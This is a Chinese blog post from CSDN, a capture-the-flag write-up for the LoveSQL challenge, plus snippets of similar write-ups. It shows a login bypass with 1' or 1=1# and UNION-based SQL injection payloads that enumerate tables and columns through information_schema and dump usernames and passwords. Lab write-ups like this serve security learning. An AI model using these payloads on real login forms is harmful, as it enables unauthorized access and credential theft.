极客大挑战LOVESQL

最新推荐文章于 2024-03-31 15:21:42 发布

a tale of a tub

最新推荐文章于 2024-03-31 15:21:42 发布

阅读量197

点赞数 1

分类专栏： SQL 文章标签： sql

原文链接：https://blog.csdn.net/qq_45521281/article/details/105533626

版权

SQL 专栏收录该内容

6 篇文章 0 订阅

订阅专栏

首先看到输入框想到我们的万能密码进入
在这里插入图片描述

登陆之后发现了用户信息和密码
在这里插入图片描述
之后我们还是要检测有几个列
这里偷懒了，没有使用order by
因为一般都是3列，所以就将usernam的名称改为1’ 导致前面错误，用union select

username=1' union select 1,2,3%23 &password =123

之后就显示了出来
在这里插入图片描述
开始有想法，把version()和database()输入到2和3里面

这里我们知道了数据库的名称，就可以开始爆破数据表

username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="geek"%23&password=123

在这里插入图片描述
字段

username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="geek" and table_name="l0ve1ysq1"%23&password=123

在这里插入图片描述
之后我们查找字段里面的数据

username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=123

在这里插入图片描述
之后查找源代码里面的flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

a tale of a tub

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

[极客大挑战 2019]LoveSQL

kuller_Yan的博客

05-19

301

[极客大挑战 2019]LoveSQL-------wp from Kuller_yan 先打开靶场看看题目一看就和上一题 easysql 尝试万能钥匙1' or 1=1 # 看起来像md5解密，但是解密失败，继续查询字段，admin' order by 3 # admin' order by 4 # 到4的时候没有正常返回，然后用1' union select 1,2,3 # 回显点为2，3；然后用1' union select 1,database(), version() # 可以看到库名

buuctf 极客大挑战 lovesql

SopRomeo的博客

01-17

3543

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Ma...

参与评论您还未登录，请先登录后发表或查看评论

[极客大挑战 2019]LoveSQL 1

热门推荐

satasun的博客

05-20

1万+

一个比较简单的SQL注入题目，写一下做个笔记。看到登录直接盲猜账号密码admin和password，然后在账号处进行注入，结果还给我试对了。看了一下网上大佬们的做法，发现我就是捡了个漏，正确做法其实是利用万能密码登录，登录后进行注入。接下来把正规做法记录一下：万能密码如下：这里账号填1' or 1=1#，密码随便写。登陆成功，看了一下url，是以get方式进行传参。先在username处测试一下有没有注入点： ?username=1' order by 1%23&password=ads

BUUCTF系列 // [极客大挑战 2019] LoveSQL

qq_45805420的博客

10-03

537

前言本题知识点：SQL注入 WP （这题居然是个连续剧。。。）首先尝试使用上一题的解法绕过看看(上一题 WP 的传送门)，结果如下：注意到密码有些奇怪，尝试着用 MD5 解码失败，也没啥思路（最后事实证明确实也用不到这玩意），故回到 SQL 注入上面来寻找突破 1、查询字段数 ...?username=admin'order by 列数#&password=123 // #号需要手动进行 URL 编码即替换成 %23 可知共有3个字段 2、测试注入点接着使用联合查询寻找注入点即回显

BUUCTF__[极客大挑战 2019]LoveSQL_题解

风过江南乱的博客

06-19

1191

前言很好，考完了死亡高数和大物，虽然还没考完，不过艰难的已经过去了，感觉神清气爽，水一题。 u1s1，线上考试=在海里考试。读题嗯，还是熟悉的背景图，好几题都是这个师傅出的sql注入。首先很容易试出为单引号字符型闭合,输入 1、1"、1’ , 在1’时报错然后尝试注入，发现，好像没有过滤，连 union 联合注入都能使用，并且很容易得到数据库名称,得到数据库名称geek 但在此之前，先得到列数为3，不是3则提示报错然后，基本操作得到表信息，有两个表geekuser和l0ve1ysq

【学习笔记 25】 buu [极客大挑战 2019]LoveSQL

weixin_43553654的博客

07-27

315

0x00 知识点 1.利用常用万能密码登录 2.利用union构造联合注入得到flag 0x01 解题思路 1.打开网站，映入眼帘的就是一个登录界面，并且网页头上有一行小字，说是不让用sqlmap跑，那我偏要试试，但是现在还找不到注入点，继续进行，等下再试。这时在查看源码时发现验证的check.php页面和get的传参方式，直接访问check.php网页什么重要信息都没，那继续回到原网页利用常用的万能密码进行登录测试。这里用到的是用户名：admin'/* 密码：*/' 登录成功。发现被蓝色圈圈出

极客大挑战 2019]LoveSQL 1

08-24

LoveSQL 1是极客大挑战2019的一个题目，它是一个关于 SQL 查询语言的挑战。具体来说，LoveSQL 1要求参赛者编写一个 SQL 查询，从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...

[极客大挑战 2019]LoveSQL 1（SQL注入）

小谢的博客

06-12

4968

[极客大挑战 2019]LoveSQL 1（SQL注入）

【CTF_SQL】[极客大挑战 2019]LoveSQL 1

十二_的博客

10-22

2197

的WP来学习他们的思路，多刷题，以形成自己的思路，常刷，常总是不可避免的，尽管菜鸟小编并做不到。一般的套路使用之后，我们要先熟悉这个数据库相关SQL注入的基本语法或公式，才能进一步破解；这里，我们就需要对常用的一些编码格式有一定的了解。本道题，我们要观察它是什么编码？一开始，对于菜鸟级别的我们来说，一般是不了解的。再来回想一下，我们刚才出现的编码是什么？编码，参加过全国大学生数学建模大赛的或者知道。进入环境，我们就尝试去最经典的万能密码。不信，咱们最好还是测试一下吧，有点像。所以，sql注入是可以的~~~

web：[极客大挑战 2019]LoveSQL

sleepywin的博客

09-29

488

用union来查询测试注入点，查看回显点CTF-Web-[极客大挑战 2019]LoveSQL - 知乎LoveSQL-CSDN博客。

[极客大挑战 2019]LoveSQL Writeup(超级详细)

StevenOnesir的博客

11-27

2286

今天再讲一道sql的题，同样比较基础，但是相较于前面某道 1’ or 1=1#或者 1’ or ‘1’='1的题来讲要稍好一些。首先我们玩一玩老套路，绕过登录进去看一看，发现回显：这行数字，直观看上去像是16进制，转换一下得到：直观看上去没有什么用我们试一试常规的注入手段。 payload:union select 出现报错回显：说明应该没啥过滤，老老实实爆数据库名-表名-字段就行了。 payload:1' union select * from a# 报错回显是：所以这里相当于直接告诉

buuctf 极客大挑战：sql